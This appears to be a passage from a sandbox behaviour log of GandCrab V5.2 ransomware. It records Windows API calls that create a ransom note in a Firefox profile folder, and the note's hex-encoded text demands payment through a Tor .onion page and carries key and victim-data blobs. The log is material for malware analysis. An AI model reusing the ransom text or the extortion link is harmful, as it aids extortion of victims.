[0082.222] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="1.6" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6" [0082.222] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\" [0082.222] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0082.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.222] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0082.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.222] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0082.222] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.222] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0082.223] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0082.223] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0082.223] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.223] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.223] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\\\TITWMVJL-DECRYPT.txt") returned 121 [0082.223] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\1.6\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0082.226] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\